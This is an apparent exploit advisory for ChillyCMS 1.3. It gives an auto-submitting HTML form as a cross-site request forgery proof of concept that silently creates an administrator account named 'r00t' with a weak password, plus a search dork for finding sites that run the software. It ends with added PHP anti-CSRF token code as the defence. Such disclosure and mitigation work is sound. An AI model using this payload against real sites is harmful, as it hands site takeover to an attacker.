# Exploit Title: ChillyCMS <= 1.3 CSRF create admin
# Date: 21/08/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://chillycms.bplaced.net/chillyCMS/index.php
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3
# Dork : intext:"powered by chillyCMS"
# Tested on: Debian
We can easily create an administrator in ChillyCMS through a CSRF vulnerability.
Here is the PoC:
<body onload="document.forms[0].submit()">
<form method="post" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
<input name="user" value="r00t" type="hidden">
<input name="name" value="r00t" type="hidden">
<input name="pw" value="123456" type="hidden">
<input name="pw2" value="123456" type="hidden">
<input name="email" value="" type="hidden">
<input type="hidden" value="1" name="gids[]">
<input type="hidden" value="3" name="gids[]">
<input type="hidden" value="4" name="gids[]">
<input type="hidden" value="1" name="active">
<input type="hidden" name="language" value="en">
<input class="middle" name="getnewsletter" value="true" type="hidden">
<input name="myaction" value="new" type="hidden">
<input name="action" value="updateuser" type="hidden">
<input name="id" value="0" type="hidden">
</form>
</body>
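The form above is accepted because the POST carries nothing a third-party page could not supply. As an added example (not part of the original advisory and not ChillyCMS code), this is a per-session anti-CSRF token guard that a state-changing admin handler could call before acting; the field name `csrf_token` and all function names are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; names and the csrf_token field are assumptions,
// not taken from the ChillyCMS source.

/** Start the session with a SameSite cookie so cross-site POSTs arrive without it. */
function start_admin_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
        session_start();
    }
}

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    start_admin_session();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_is_valid(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && $sent !== '' && hash_equals(csrf_token(), $sent);
}

/** Call at the top of any handler that creates or changes users. */
function require_csrf_token(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && !csrf_is_valid($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// In the legitimate admin form, emit the token as a hidden field:
// <input type="hidden" name="csrf_token"
//        value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
```

A page hosted on another origin cannot read the session token, so an auto-submitted form like the PoC is rejected with 403 before any account is created.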
Thanks :
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0.
Please visit : http://orgasm.re/
Groucho